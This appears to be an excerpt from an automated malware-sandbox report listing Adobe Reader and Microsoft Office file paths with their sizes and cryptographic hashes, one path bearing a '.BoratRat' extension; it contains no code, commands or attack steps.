SHA512ab25bb0be5f80b2c3fee30e35aeed993fbc5280834bd0e6d2ab7e48b09ec5e38a261dd8f68acc715aaddbb596c47e68322f848531417d25ba19bc7e33b35aaea
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\logo_retina.png
Filesize6KB
MD5e3af592ea8b31e7495e48ab6ac22d415
SHA13c40e9b05a7be9a7e7f9bcd4b02b8cb61b65bd4c
SHA256621f35012899064b4c40a549a9e221f712e75bf13ac69990c363a648283e3052
SHA512651adad14721dfed1e36c5009caf9c04cf1d024b35b187c0f98d456f0fb5218559b5d698697970e45fd165c2d4db0710aaaaaf3f00d5c12fbd2acdc3e07ce412
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\sat_logo.png
Filesize832B
MD58bc25a8a17642f8b13883930652a56bb
SHA15a011f8be10a146c584992234ac9cd7b5de682ad
SHA2567237f59b895ad0321bd1acba35a860c84b07e6958ec5e17ec38676264275633d
SHA512b6750c535fb48722840076eb0afc01fae88ff94d0d52e12d42e7b346b9a5c08a6cebfc25196ce3a10782e3746e54c145cafeeb570842086e646e9ba2b7f49ee4
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\sat_logo_2x.png
Filesize1KB
MD54f9abadfda79e88204a976767e630a81
SHA1dfabea2cbc722e3b944f70e57c97a1f95eea064c
SHA256b0b72f409a6afed7bf3a84ab2acb321dc157fb39c6a9154be6ad3bfcca156805
SHA512014444ea7ce72bcd4d4feeea19061395c4848d8f003e5e75293c830b9a111255171a30139fdbbd8537759f828de6b7404261d679df75b2a26d46a277a4bdcbed
-
C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt
Filesize32KB
MD569e8486ac1094b9c19066f5f2d04e2fb
SHA13fe42d8c58e2d76b2f272d7d83baa084133159f5
SHA256c4b615cd5963f4df6a4d2447c3a19708d77ae54bf65d0ad7d370b8ba74c81d71
SHA512b8b457a5e5b905a9f6eeed7a1c0f77f0e3fd8119511a9c60f1af890a650e6f90630b8d17adce8157b4cdfcd53c62bcfe577fdec552bf0a7a587e2e8218f79609
-
Filesize
48B
MD5fb5392de1c41bffc48a74176c4bd14df
SHA14ca069c0d38e5ca258b2d743a95d98f60ef6964a
SHA2568966675c3250f21d86672e16c257f1b84c3895254fbbd1807352c29997dcdc1d
SHA512028d58bff3b55c7b0f3ca55e67f4fe809dc2c6a0f7d5ce1e1a8d6301ba68bd6706938c3418adb26c6e7bcff9dd72ea02fbd96795d56f5eb5c62f6dd69f0714ca
-
Filesize
832KB
MD5c1259bed6439aa6e5f630f76c82faaa3
SHA1bb001fca6d860de4800863b8b3ecda9661e27ac3
SHA2568454572e0371ce23c3f70b827a12b4d6aab591b1958117cdf0a0d8920c11941e
SHA51214ce580484bcd5bbfefa5d26f39b19f480d08890567abca2261409a39be0a99037a19d1f67e3888e70a0c6cb1f1651f679e7be9da3650d621b86fa44fbbea421
-
Filesize
972KB
MD5f84250cd82def6a8ddf2e96673b4c0d8
SHA1af06f75e48ff39f9203da6d5ee6a299bcc00c168
SHA256256d30061f267ff7240cf528f6aed0bb447f75dc5f8666a5bbb8d4320aab6f68
SHA51247e2a12f1c544a7259f157628808bac7f0cff5157f44f109d9d86ab43c2ae12618e0510057d17a648ed9bdbfd33f3100376ce9b63fdf52fdccd5f6b78214dd0f
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\Trust Protection Lists\Mu\Other
Filesize64B
MD5c30513c2d02b97cdcf3b429322048104
SHA10d0f47fb24255e5104dac2611042c967107a37fc
SHA2568ebde371a260c9955e63739daeba52f4a17b7c9cf00e6af00d35d92857e37247
SHA512e545fc28eb26a985ad69e07cee255ff50bfbae0e37fe758bfed04e353815c5dfd26e1f5d362c113d12e7ba7cf0ddf129c86efb63cd3e88217b4fa06c13986a99
-
Filesize
3.9MB
MD5fb544cf47c7e6aa7f45f90e0d911d07c
SHA1ff86dae2fa9291ece582f36b91c5ba0516b4a87c
SHA256982136034db61eb4c5cd684ef2b5271eaa5a3de02d640522d7f9e9a4f19f24a4
SHA512b7391b70776bc5e2396a80ea002006133a7cd347f123fc00614cf3b9955a6996c7a576753b4dbbed56d63094fd3f7ac0286c4bb1631ae59cb057992473171180
-
Filesize
558KB
MD53718c9de534a250c91af369b68cec585
SHA10f34b9a3b5dba1f9873c257e7ead475134ec3862
SHA256f2c5a7bf2f786729098a2c968d692dfc930b9992bb1d924c3e3e0158c66d1806
SHA512c91e42877a5793f3857a052616e424e6a705f7f388f49c189c52549b33719075c1762cbb171bc7b7634443e470428de60b349d3e66dbab104d7a47644bbd4c1b
-
Filesize
95KB
MD58b883cfb828e42d37338ecfd5be914f9
SHA1fc6a3aa4613ccba7144e4ea0bfc65d583fba0750
SHA256b7de8344794a8e56100fc90b16932fc3bbfbecfb1835bd91e550d2b80cfd710a
SHA512efbd59968258fb528ffed32d9c15cb8de4dae30ba9edb9c8fdf5ca0c57c5f23e7f51e17b2459853b1cf8b86cb61ceca2bcdc43b34942dc9221c48b494c014c95
-
Filesize
36KB
MD526ff67284dc3aad964b49b24a590760a
SHA196da840f7cd1de5a41d8a99d79fdb4e85739b2bb
SHA256b6385bc4bd4c360bcccd9ec85ca45d07f58081c9c40a7b41020f01dbb374dd37
SHA512dde58f02c3eab34c91729b2a75d8ef4be220beae0a22e3f80b8a892ec0dd6c0ef68f2a2c11afa71c59059ec04254b238f678eac06223f20c642dcbe46bc972d0
-
Filesize
160B
MD5c30c07baa17c138a13e17052d3fa7cf6
SHA147f192d626aa1af95002c8360b9747e98994a521
SHA256c96ca9888057e1db1eb54683f0edccd096423260557f74100af24477851cefc9
SHA512881c0123c794f2b6b034cb18bd69ac3c31d5947e01b680b46c0973a498d5f9b45a89acf7907fa23ca1c2691dd900931aecbe5795c187fde1f2e696166a825d90
-
Filesize
48B
MD59f6949929ca656c791ebe02c48152ccf
SHA11286460cb7df2d96c69c43d6ce21114d57116c03
SHA2565316fdaecdb6d5d12bd8d1d5b0af2441a637e3fcb4bb6dbe1ad6b98e294458d1
SHA5121bde7ede376e8d55ef2743f439796b9f16937c44c895bb31d41e35f51cf875cac1c8e1f1e4fc5df3085f8e97d1829b53b6f27a5ab25f8412022b8b936ef130e6
-
C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Localytics.dll
Filesize16B
MD504992ba54c98703d1587f7e7bd14bb6e
SHA1d45161b17f67a5cfbff199b63df862ef698f42c5
SHA256bb4a87c51ddd413ecee6a41edac55bebdbb323a7626a8b9adbd733c2b189e211
SHA5122b09199c686645d85df768bd9b5ee2c09abb6b17123a0ea1fe94a74ea28535b4091d90ed58e846aed6dccc4708fdb88e23157d12a88cff691b29d9b7f4e3b285
-
C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\zlibwapi.dll
Filesize274KB
MD5c3de2e0ef2390208308d19a667511d7c
SHA1aafd4b775254040f75ca42dde63b046f8cbc303b
SHA256bf5bf44f16687a3283b454d28aa0bcd1366207b1cb8e613954be134213c1556c
SHA5120e33e40be8b9c47e0d432e3d1cd1547042d7ec7904ebff4d0806133948f0b47b0a74a75f30a46a09baeb1e6b6668030368875b3bd91d18e3ed4ff86282d4ab79
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-file-l1-2-0.dll
Filesize18KB
MD5339c6be0eab616094ea3396922b07939
SHA101aed2283df54a5fd3eaa3be4f2f34150b11e731
SHA2564cd00bd528f99af87460a8d49ae99d391e22b124ddd2731571f10c68cebfee8e
SHA5125740312ce9c4346196fb6fe5b25a9e5fe5910aea84e018d913ac786ffe5c2018fe6ed2fc8c7105dd8c6404378479646bae9c93a0e75edf76b687fbdc5afef43c
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-file-l2-1-0.dll
Filesize18KB
MD554f0489fe04448cffaf9390692c22463
SHA16ce434026a626fb5b07cb0e9b39fb4b0946ddca3
SHA2566fef35d904c82c9a5706edfd9105482cc63132651a468b6b368c25e64a7cddf4
SHA5123031b323a2ffa8423f9fe86c60003194c97bd9b1a88cab8658e9b7208af3e862a5a18ae18fdf71a6df68de4e3f1b73bf6c4301867f1339e1bbf7a14afc959d4b
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-localization-l1-2-0.dll
Filesize20KB
MD554fc546b71b78e7beb9589b02d33e054
SHA12a97bb834646e3e3899b8f851a76ce25f99465f8
SHA256993cbad15c696310e2085080ab2cb56d0e5ace98f968077a74dd01bb93d16cc6
SHA512db3d89190db3d5f9da4e72163f5886c0dd8176857ead49305ce3e0af8655306afd29ed0fe18de426ebfc99354b247d166f78e7ec754c3efc424528d644b21da8
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-processthreads-l1-1-1.dll
Filesize18KB
MD5b490d4c8ebcf01e65b2d6eb239d82420
SHA1a376aec1ae9538cf95f8b474215e2981522c1468
SHA2568bff7db2ba3c699d9db85a90905defc041cb87b72dd7cf6040576c80ec102175
SHA512179a1e5b8f2dd1a06cd5bce3a0108fa6aae03471aeb5211b3c60abdee8b056440f6ede0d7877021ead99403ec805f4c1de875cf8e21be7247c4363752711e9b3
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-synch-l1-2-0.dll
Filesize18KB
MD57910690e6c08fe8b229f795e81a9d6ba
SHA1c344232aae69dd3cea6b06e427b1cb5b4f2ff558
SHA256ab9484ff92d5586f6c76ad2f270c5afed8facc21f96a08f25126b9af23abe465
SHA512a06919224b6c1f52bda9c66386470bc775e5c4f3173b2259524781e789eb32df6bd52e74f2d5f888008b27bf364073e927a66683e42cc22f0b82a143728cede3
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-timezone-l1-1-0.dll
Filesize18KB
MD5d15dd921cbf9e0d81b94eb86b0b7101e
SHA11d94ce2f5ec4f00ed76f8643efc3917dd5d46e54
SHA25672bee22cc33d7d615a7136fdf9963333050674d0d9b54cf032f552e25fbb4b8c
SHA512da41225f9791ded813276a1934ff415ce98d84f46876c9ffa8e89e69692957677202807dac08674fb606406a3e90d5ee9a0087a96bba06994b08a9369734e31d
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-xstate-l2-1-0.dll
Filesize11KB
MD57b0360a1cced425944e906d15d09a90b
SHA14c323e300de86a36631f4add3afca1df1b379e6f
SHA256434a01b0b3807d7084471263f42bcc07c8e3be23abdc2585457a2840cc410c5b
SHA51230fe2b5871ebd8540c5eaa7c20f4f7ef06a6aba380e7dfd58016a4d4ba2c34d9b82371842eb20c91593aee2a23ca053739da69441f88b5673af7a11982f74150
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-conio-l1-1-0.dll
Filesize19KB
MD50bf68146c22ec9c984f0de95097c2331
SHA121c61b244d8a6c0aa037af73ec5259ea42d6bd02
SHA2564cab91bbcf997a1d76f6b7b7db543cf1d8b087d696c73c46d79286a0727b91c3
SHA512d59892ced522469855464306a4364aba9075288e37a63143a9d670e636e22fc217f80e4e621ec6592b6554643526bd23bec7ae10b7d20e27664dc3c25505aed1
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-convert-l1-1-0.dll
Filesize22KB
MD548d0edc9716f9c61bc247444abdb2121
SHA12c58d6d7fb83d343099ae6b001ccd715a543ea6b
SHA25652b13667ab66bfd3f717e17e6edb722dc42e6c655658f03a9c42d2079c62481e
SHA51209abfcfe65e5954ec61f7cd53aa690ce8cb22639019356e2362175a6ac596478fb833c023d9f72d32c9084c04107ced01ecb1a899fd4b3241f9e2520d113ff51
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-environment-l1-1-0.dll
Filesize18KB
MD5b294d35d575c1645c13f808aa45124d6
SHA1ccfa5e49dcfb040ad4576d728265c7debb87eb00
SHA256883782d4b835b2c862416bdd63fecd171f1dcebabeb181512ae6048b095fcb01
SHA51277d50b50241af441a4e7c68ff0a0cb03bfb7b40a9459977682cd2e604932ce1568902b0c195bd373b693350ef2faa1fcd156d038c8da76c1b317fcb24db2a4dd
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-filesystem-l1-1-0.dll
Filesize20KB
MD5ec64027d9a14cfeb84df2b3d81431d63
SHA140bca743662d2d7298bbbe1440d65c5881854f45
SHA25677bb3f665f04654addce7de80224a2f0c609ed2417bcc53154729ff71c9759af
SHA512fe68bea1d24f02833625f999dd29829b8d8ba371e1b25cf6733b800f4d26aea59f8713c580d02e732656411934b9edd43dc2fd57ec3216579635b6a3a95d1669
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-heap-l1-1-0.dll
Filesize19KB
MD5f8a3bd5966a848bb9b45610def88facc
SHA17b2c51dc6598f993e101263d1d8dbaff01e5bc12
SHA256a6b653163c6b0a891ed66658187e4607763b344720194411a93227652a0a4034
SHA5122315dd9311cde42a1a0e6435709ffa9d2368d917cd030f45ef447a23262ca100f2182ac43b8308a747682a1f7b799fe26fe8f37fe757da3eb265adeb2092dfe2
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-locale-l1-1-0.dll
Filesize18KB
MD5cf93ae98901a9e1ff484da3ddf50de30
SHA109fa8286fa39778940a95ffd3a99432e9e436832
SHA256656f39d051e9be98742237de26a921ca488cb588c1ae2807f907c90877a8c82d
SHA512a69f6d5e96d73c0052948687e03e6630451d8c0a554fd41432d7f2ce68f5677ab63aded294c6378ac0ed7959b8540c4c8cc26606293d602ca72713c267069355
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-math-l1-1-0.dll
Filesize27KB
MD5e1c38947ee1f511d818dce91c75021b7
SHA13cc88db0d4e0cbf752f7bc559e3d710edf4bccd8
SHA256e7a0638ffc1953fd09f5e8e9a13d10617df49e176b1e1efce9ba2c0dccbbc60e
SHA512c24686fed93491afa3fafbeb57262c80149bb8beb230fbbdcb3a594e3f95dcfaf42f88a4f290cfbc74f71fc4c98152cedb174e4e75d3721f003f7c8189d67690
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-multibyte-l1-1-0.dll
Filesize26KB
MD5e35d8dc16da6a13dcede94c1ece3965f
SHA191b980d8d70dccab1382318ae2ad347f5c9104c9
SHA256f2defe88ddaf2f784bfaecf473f12502a4020dcfd12d35212d90789f489ce85b
SHA51258f3d99cfa23a35f65adab72932ad3e59923b253a1deed7db1d8f889f196d52b1461a4a6b968af27307840159dd09b34d03e4d2304d2b120474f4d90b7dd4e74
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-private-l1-1-0.dll
Filesize69KB
MD59b4372688253d12b26dfddf4d0f177dd
SHA141f8b6699cc20582ba11d03a7bf19213eb4dffb9
SHA256b0fdc733249a01b82ef3ae0dc5efbc21ea58c9445425047daef59294d663e248
SHA51219ad249ab54807c7f409113ffa6c7ad6cfddc989e57b76699e072c4ae8b430da33856aafbcc084de3f4cc8d7b2cd109e55fbd930418caeae80dae39057012bde
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-process-l1-1-0.dll
Filesize19KB
MD5caa1a1037126cfe39f529b88e7e946b1
SHA122bd24472237687c7bd645def734e95a27c23098
SHA2560d71b6088457963be4dc7811e046880bef6973ed7905055a57b02931b0051649
SHA51280871efa061a9cb1cffee94aa6c68c90bf2bc2ca4e838c29358925279ee46208b60e2ec37327bb185195f8f20ba748167ad36d73b2b57f38cebfffef689a551f
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-runtime-l1-1-0.dll
Filesize22KB
MD5bcb976775c72fc4210b665ce5a24ccd4
SHA1a04a419756f5d612d7c8f4efea02b11796460611
SHA25626db9ae9ec8c5824cf52ec23ce4a19ca364e1eba7af01bbf84669bba497f3dc3
SHA512d30772629f7604efca2514311bb5d6e5e16cbf175e6c2403bc5209e6bb0db736f893331554aa7139d158550360a848fdd3b0aecd6c600f6b0647c82848f9b0de
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-stdio-l1-1-0.dll
Filesize24KB
MD5bd29e8e3f87aa3943dbfbe4434fb02f0
SHA1e37356e2dcb2ee386a78e4e2a57f44518ece4177
SHA256ef8e00bfab2a614f817f3a095ff9f6885c6627d9f8c564090c516f6dfe41fed1
SHA51200c5237c443a9cd9949eb37a02710fc875a2d707484eaceec628fefbb0afae99fe8940a436cf0cbedd7c4bbc0bea05dd4ea77242d8fb317fe223a615089a0639
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-string-l1-1-0.dll
Filesize24KB
MD57aaa0b61f9286f599fa89e4477617c77
SHA1a0227ff00c861153dc56f85256b933528ab41611
SHA256851b76ceea7bcc456509257b6d9418582f669482eb2bbccebbddc6eac36dcc62
SHA512bdac8e4ab872d36350e330444cd81d2d924d74b73904b677a1c418702fa822e889121ace8fae5b0832da7c19fb83efe7c291f9acaf27c5421f84455b79d5a7e6
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-time-l1-1-0.dll
Filesize20KB
MD5ad7dd997399c01fef3512f53bfa03365
SHA1fb28aa981375a33843b949b2d35e95077be634f2
SHA256b27ace263543682a8f4cf3e197a70e9f72fe41f30ef8c2fd622268a7a2d7ed71
SHA51298cda9dffc7245495e462fb909b587e37ea776b3eddbd6cc75aa8b4395ff7f80623b66953b2ec2e36fbeb316c6afe52fddbb342908881272dbbf726ae95195b9
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-utility-l1-1-0.dll
Filesize18KB
MD516378ce15b64cbe3b679ebe5df6fa654
SHA167ad1e257a3d5c27d2eb960638d84da613dbe1fb
SHA256b94f15fe4f5458e812fa758e141ce7289e6170e5bf4e1e61932756c668629b86
SHA51260bddd8a4f2a1bccd85ef16961e10aa7e1ca2e84ddd7b44e09d961bdb70ba1fa689dc19bec4c1ce0ef847c6c86feaa7932eb16d6a7d7465e07ca9bfca058dc5f
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\concrt140.dll
Filesize324KB
MD5c1b6d2ad5bfb8221c3923c7bae7b5589
SHA15b2810f96c363303e7b3877f4a3357f532906dda
SHA2568e8f582b9b2488b2e634a73d845de7277c222088b999ebe483c2857f0e3e75fb
SHA5127438b60821c0aa528333899bdb9c0aa500cad5c50dad15758ce01d1620a203faf8a435949208fb4ef7b3dfeb07152ee73fa66f8899037d7b15e35e4a8056b214
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\mfc140u.dll
Filesize5.6MB
MD5aede477b557ec1c0fc9f7a82a548242f
SHA119e9f21eb84f16711fcdaa893bd53e33e3c5c6ed
SHA256c146526825375b0adfe75354d18391e93e760c657ee8020c535f1d6922e4a89b
SHA512e7e54c5c19a1d6c3fa4de47a28e4455b41669cc5399d063b35af3d41d7fc5c5c6278153952b6d455be4e62d2d56cd2c323677130f3e669ed07691921e88b3afe
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp120.dll
Filesize644KB
MD5339070b0dac735546dde4f364cadced8
SHA1bcbcb401f9939f3bcb3ead22e5136e3dd621e3a6
SHA2561f17bff1d7b7a7615172db66e2fcaf85f437479a7c31e599d81fb647000c85c4
SHA512ea7db94184d313a1efcbe89f867f8002228c2b367abde6718b95ae12c138902dc8be42c1910af82a746eeaecafaeb21cd08e62fc8485f6fd9afbbfd79300ab37
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp140.dll
Filesize613KB
MD55841ff1adb3d3b5d734b994cebc888a5
SHA11f1a7f915da2e63a26ab19b427af3f5d91ce8112
SHA2566aca9012908543eb4653558887a79b095243ed5b4d94dae6eb0dbc1da1110805
SHA512eb300d5dd1e8d72a77b9eaec167ad1b35a8aaaee2194e942bd283bc4516e292f0d8e986c0759a5e41feb8591872e333b29532685cc9226400877c822479f3172
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcr120.dll
Filesize940KB
MD52ca3a080fab4bf7784c3fe7ce08da1f2
SHA18149e9b2e3680d14a25c6ee6e727e0a912372505
SHA2564eeee3e13f59013dc4a8fce6f54c8cacdffc3d347f0c998efd1db334878e8f77
SHA5127ac3f980e436e2ed69f15e9f14a4f226fce62c8c251c6ed76a0c10bfa93d9b2166a6f8dc062aa48d7d2afc1ee8173c11132e6fa8eeb37aa26b61905a7aa3b6ac
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vccorlib140.dll
Filesize358KB
MD500ddfeafa86428f64f482ee81b12b4af
SHA13474fcfbfd65488913c52912235e671b0a27bfa6
SHA256c5bf6f563fa0f108a232a1ce11c0a5bf441ca7abf14fb96185f6627babca0709
SHA51296246ac4380d5f6a5b4af61a4329211b2fbff8bcbc79bdd8912a6480806713731ba1ecd36933bf940e9a75e9e32aa8cc527f455d63051361b588905c18f59b53
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vcruntime140.dll
Filesize83KB
MD5fb7f6e24e5dbc7e22838136265c1a27d
SHA125f1eea2b3bd6021eb6bd60ccf9f1e554adedd9c
SHA256f18624b5eaf5294e38e43018eed61cd1cc0c2259758c86d9e0158fa1ba0eda18
SHA512a9641ebb2c7b42f8b67bc4b0963869c2bbb3728c250ea80aabc1a2fc5f9e7244bece98ef137571b71a64fc7432ee92e02d977e2b83a850d3e3466b73664f0bf7
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-file-l1-2-0.dll
Filesize18KB
MD51dec39c5adfda9dfa7e7d98fe2c9bc71
SHA1cc1ca16d36cf5f23c5cd69bb3f4730f05814f602
SHA256a597fad3dc0add34db2503991975b2e734bd8c12080d1af5119b5db7cdacc9a2
SHA51263a57a5e543a041d21b536c543ea0c11aa646141e4423fe055f314e22801cc9e1176b494bcf221dedf3d6e3560d43d15eebde2bab0b551ee5f6c3df48177819e
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-file-l2-1-0.dll
Filesize18KB
MD571013d0511c2af41289992e6ab7e8072
SHA123bc4d5f0e61d402078b064d9d924a50abc9e623
SHA25667e400ba678aaa793b3b139eea186269a6c0ed843bb0162fe56c4daa26169df1
SHA512a4e35527fdeccd140239bce6acb0cba81af580f202ff1da277529188a1470adf5a264244de71e804ad08ef1026f5a666c6f9388f48b7e50cb430b3a5e79c5514
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-localization-l1-2-0.dll
Filesize20KB
MD5afd7c5f4f7869c2e02db6b88a4eba035
SHA19a881d528710b156690726d7a655d57bd760a1fb
SHA256fae11f68f303f2f67a8634ed6904b879304119e81c349f88cf25bdfcd12dbbff
SHA512e89adeefe0d1fb6f9a516f7fed29d9ec35ebe5b1b54c87e88a7e3b49ec757208b7af870db72c1378c684ad4919fb4850e7983ec820dbcf7408d22c78f6187cf0
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-processthreads-l1-1-1.dll
Filesize18KB
MD5cf803b4ec86a2ee10d6eb9dc5bd05a5f
SHA1921d55b52251190032e8c09e165dbf5901f4f03b
SHA256649efb6f8cf0083ba5ef60ac4fbda80b9ea68fd8d6ac95382d6a2c46b890b888
SHA5126e61e31f4321b659d64e1b061d7efe097d99b968958b07b2c40662302e27e99d29a94b951c9627af4af98f8b423bd139ec78e8c93184a3eb19e5134e0d02eb8a
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-synch-l1-2-0.dll
Filesize18KB
MD5a8a44848a3ed939a510baf520db56133
SHA15cc33a46975e86b96f5c84dd520980806acb52a5
SHA2564865b14c297ac5ffee739bac2c438576a4436309ae167a3c4a862609d648e266
SHA5125ac9ad9db80a560e84355e67d683af8569ed5017cbe157e340b2888332e33dc90820917923be6578f35d2b6e04df11ba95348e2b0c8ba3da3d796ce39e3be1c3
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-timezone-l1-1-0.dll
Filesize18KB
MD5bcad5d9a7024b7fcd2faa1abf783bca3
SHA166e41b3ce0be55db2aaa532c4b74b1ec46b38785
SHA256aef0e5129e8773bb825590337909211f55a02959003fd6a512c32c86db7dc984
SHA5127bde6991fba2cefde4f93d0c5c3ee9ad93bfc3ca891151efe84066d8f146e0938f64c6af5ba5e5506abbded8c7a79f9004d0eaf9dad9683e0b64b7e6046d4fb4
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-xstate-l2-1-0.dll
Filesize11KB
MD589ac8da153e5169d8029c8db7cc95143
SHA133b0053d00fc2be2385f76b8e45452348aa280a7
SHA2563e1a1167687c2689e762996f41f3a0bc41f7aaea9e299f2d3a4839b363c65983
SHA5126cc25b2782f65756ea9a57b686625d8bec25758daa330988395b8d853822e9710783ccd5ddde55d615c7fb02712c8ca8f4b6ef2162f42ead041962fe71c7d05c
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-conio-l1-1-0.dll
Filesize19KB
MD58fdcb400daab836867f6af3e1aec161b
SHA14ad8ccf0dd80c1b6b39a272196bd3bf9c7c30081
SHA256dd94e3a67517388f9a02b919345cbfad20f73b1e6a40d5d9c7fab659c564ff77
SHA5126923c87869f62b8b58de1e59470348b59b911034e6d690f9be69db76f75fc5691b232f179dcc8db46e64c62b6f82f79488c37fcf12a58022e50432e952306b96
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-convert-l1-1-0.dll
Filesize22KB
MD59fb5bf5cb7e83c26d6486ebe1007abd9
SHA1b6857e0defabbebd0c927009a3860bd793010d64
SHA2567e25ee76e2bbcac034eb7a7a63a3df429e458835b592e196f3069111682ff8e6
SHA512ee1f992ebba4bb2980332bbea470d5f47a4813b5aef01035180db87396c877606d54482440f6eece97d77236d4b9acfedad6dc8e39d8ab3ea73f93cc97263478
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-environment-l1-1-0.dll
Filesize18KB
MD5e66ed9b3c8d2fe8009854dce1fb67d14
SHA17577b6bf95315f089a310af6a57e36733a8d4c9b
SHA25643e4d190498781a78814b40834632add3abdbc0a67073c30910e9874246dce33
SHA51236501ea728863e305929e55f276c20533a7536507351ff97eab7c53a5bc6b70f0d8dd06aa0c67d96f1ae7d88d8924e7f1f5cb65e7a7f32a829a52b060768e03c
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-filesystem-l1-1-0.dll
Filesize20KB
MD581ad66c0b4525c166ca474fed1aee74a
SHA1cb6f8a2f4307499d15c6b0421b8143d4d2a811e8
SHA256f27de3672842302c1cda3d268a8ceaac6eee8b1c45cdf5028a4e9d715141710c
SHA51236e9da7296631153c9b4b68e88d63f24575c12516a257be10127bf375d67f534811a02b9e1f7e63ffc1e290f073d508781d5ffcfb559d8981876c863de37a6af
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-heap-l1-1-0.dll.BoratRat
Filesize19KB
MD57c025c27517bdc612ae60c8bb35cb7cc
SHA153815f9e818eedbd7321ed59604e930ea7209b43
SHA25693cc10b88f78efe7d3de10e73aa375d8c3c0d4f320df530f7b544e4fb455a680
SHA51230b5903fb97bf1ec8fff405316ab5715a9ad6b0ff559d37e214abfcf7ed8d298f20cab3406c492d07494c774db0ed63de2dda953d7e0392aa32aaa81d58cceeb
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-locale-l1-1-0.dll
Filesize18KB
MD5fa1f159104ab7793caf8ad9c9de41bdc
SHA16f5d736205001d19c7c7a267531b325164c2c3f9
